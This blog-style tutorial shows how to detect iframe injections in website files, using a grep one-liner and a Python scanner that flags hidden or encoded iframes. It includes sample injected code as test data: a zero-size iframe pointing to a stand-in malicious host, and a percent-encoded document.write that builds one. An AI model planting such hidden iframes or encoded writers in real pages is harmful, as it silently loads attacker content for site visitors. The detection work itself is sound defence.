Parsing Webfiles for Infections

Let's face it, there is a lot of malware going around these days. Gone are the days of mass .exe emailing (though it still happens). Now you have websites being hijacked and used as carriers of malicious code.

Finding the infection

The scripts here only detect possible infections; the cleanup needs to be a hands-on fix to ensure you don't break anything. It is also worth mentioning that iframes have legitimate reasons for existence and are used frequently in the industry, so a file that this detects with an iframe is not necessarily infected. The script walks the website looking at every file whose name does not match the binary-extension exclusion list in the egrep, and searches inside each one for iframes.

# Dots are escaped so only the listed extensions are skipped; xargs passes the
# file names straight to grep instead of building shell commands from them.
find . -type f | egrep -iv '(\.png|\.jpg|_binary files_|\.gif)$' \
  | xargs grep -li iframe

The result will be a list of files containing iframes.

index.html
services.html
bloglinks.html
site.js

$ cat index.html | grep iframe
<iframe src=http://infected.domain.tld/badfile.htm width=0 height=0></iframe>

This is a simple example; most injections are much uglier and obfuscate their code, so a plain search for the word 'iframe' can miss them. Cleaning depends on the strain, and most strains need an individual cleaning procedure that scripts cannot provide.
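The following scanner is an added example, not code from the original post. It does the same job as the find/grep one-liner but skips binaries by content (a NUL byte in the first 8 KB) instead of by extension, and separates iframes that merely exist from ones that look like the injected kind: zero width or height, hidden via CSS, or written by an encoded document.write/eval call. The sample site it builds (index.html with the iframe from the post above, a legitimate embed in services.html, an encoded writer in site.js, a plain page and a fake PNG) is constructed for the example; the heuristics and names are my own, and like the one-liner they flag candidates for a hands-on look rather than prove infection.

```python
import os
import re
import tempfile

# Regexes for the checks (constructed for this example, not exhaustive).
IFRAME_RE = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
# Zero-sized or CSS-hidden frames: visitors never see the loaded content.
HIDDEN_RE = re.compile(
    r'(?:width|height)\s*=\s*["\']?0\b'
    r'|display\s*:\s*none'
    r'|visibility\s*:\s*hidden',
    re.IGNORECASE)
# Markup assembled at runtime from a percent-encoded string evades a
# plain grep for 'iframe'; flag the common writer pattern.
OBFUSCATED_RE = re.compile(
    r'(?:eval|document\.write)\s*\(\s*unescape\s*\(', re.IGNORECASE)


def is_binary(path, sample=8192):
    """Treat a file as binary if its first bytes contain a NUL."""
    with open(path, 'rb') as fh:
        return b'\x00' in fh.read(sample)


def classify_iframes(text):
    """Return one record per iframe tag: its src and whether it is hidden."""
    findings = []
    for match in IFRAME_RE.finditer(text):
        tag = match.group(0)
        src = SRC_RE.search(tag)
        findings.append({
            'tag': tag,
            'src': src.group(1) if src else '',
            'hidden': bool(HIDDEN_RE.search(tag)),
        })
    return findings


def scan_tree(root):
    """Walk root; report text files with iframes or encoded writers.

    Each entry is keyed by the path relative to root and carries the
    iframe records plus a 'suspicious' flag set when any iframe is hidden
    or an encoded document.write/eval call is present.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_binary(path):
                continue
            with open(path, 'r', encoding='utf-8', errors='replace') as fh:
                text = fh.read()
            iframes = classify_iframes(text)
            obfuscated = bool(OBFUSCATED_RE.search(text))
            if iframes or obfuscated:
                report[os.path.relpath(path, root)] = {
                    'iframes': iframes,
                    'obfuscated_writer': obfuscated,
                    'suspicious': obfuscated or any(i['hidden'] for i in iframes),
                }
    return report


def build_sample_site():
    """Write a small constructed site to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix='webscan_')
    samples = {
        # The hidden iframe shown in the post.
        'index.html': '<html><body>hello\n<iframe src=http://infected.domain.tld'
                      '/badfile.htm width=0 height=0></iframe>\n</body></html>\n',
        # A visible, legitimate embed: reported, but not suspicious.
        'services.html': '<p>Map</p>\n<iframe src="https://maps.example.com/embed"'
                         ' width="400" height="300"></iframe>\n',
        # Percent-encoded markup written at runtime: no literal '<iframe'.
        'site.js': "document.write(unescape('%3Ciframe%20src%3Dhttp%3A%2F%2F"
                   "x.example%2Fb.htm%20width%3D0%3E%3C%2Fiframe%3E'));\n",
        'about.html': '<html><body>Nothing to see here.</body></html>\n',
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), 'w', encoding='utf-8') as fh:
            fh.write(body)
    # Fake PNG header with NUL bytes: skipped by the binary check.
    with open(os.path.join(root, 'logo.png'), 'wb') as fh:
        fh.write(b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR' + b'\x00' * 16)
    return root


if __name__ == '__main__':
    for path, info in sorted(scan_tree(build_sample_site()).items()):
        flag = 'SUSPICIOUS' if info['suspicious'] else 'review'
        print(f'{flag:10} {path}')
        for frame in info['iframes']:
            print(f'           src={frame["src"]} hidden={frame["hidden"]}')
```

Run it as a script to see the report on the constructed site, or call scan_tree() on a real document root; anything marked SUSPICIOUS deserves the manual inspection the post describes, while entries marked review are ordinary iframes that only need a glance.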

 
